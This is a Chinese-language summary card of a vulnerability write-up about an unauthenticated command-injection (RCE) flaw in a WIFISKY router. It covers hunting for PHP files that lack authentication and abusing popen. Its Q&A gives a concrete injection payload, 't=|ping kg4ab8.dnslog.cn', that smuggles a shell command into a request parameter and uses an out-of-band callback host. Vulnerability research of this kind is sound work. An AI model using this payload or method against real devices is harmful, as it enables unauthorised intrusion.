0day之某路由器前台RCE审计
💡
原文中文,约2000字,阅读约需5分钟。
📝
内容提要
本文介绍了一种WIFISKY 7层流控路由器的前台命令执行漏洞。作者通过使用Visual Studio Code软件和了解Linux中的反引号作用,成功找到了一个未授权的文件,并构造了payload来执行自己的命令。文章提供了详细的步骤和示例。
🎯
关键要点
- 介绍了WIFISKY 7层流控路由器的前台命令执行漏洞。
- 使用Visual Studio Code和Linux反引号的知识找到未授权文件并构造payload。
- 命令执行分为回显和不回显,重点讨论不回显的验证方法。
- 收集了PHP中导致命令执行漏洞的危险函数。
- 发现未授权文件筛选的关键在于鉴权代码的存在。
- 通过popen函数找到符合条件的代码段,构造payload以执行命令。
❓
延伸问答
WIFISKY 7层流控路由器的前台命令执行漏洞是什么?
这是一个允许攻击者在路由器前台执行任意命令的漏洞。
如何利用Visual Studio Code发现命令执行漏洞?
通过使用Visual Studio Code和Linux反引号的知识,可以找到未授权文件并构造payload来执行命令。
命令执行漏洞的回显和不回显有什么区别?
回显是指执行命令后结果直接显示,而不回显则需要通过其他方式验证命令是否执行成功。
导致PHP命令执行漏洞的危险函数有哪些?
危险函数包括eval()、assert()、system()、exec()等。
如何筛选未授权文件以发现命令执行漏洞?
通过研究鉴权代码,找出缺少权限验证的文件,从中寻找命令执行漏洞。
如何构造payload来利用popen函数?
可以构造payload为t=|ping kg4ab8.dnslog.cn,并拼接路径来执行命令。
➡️
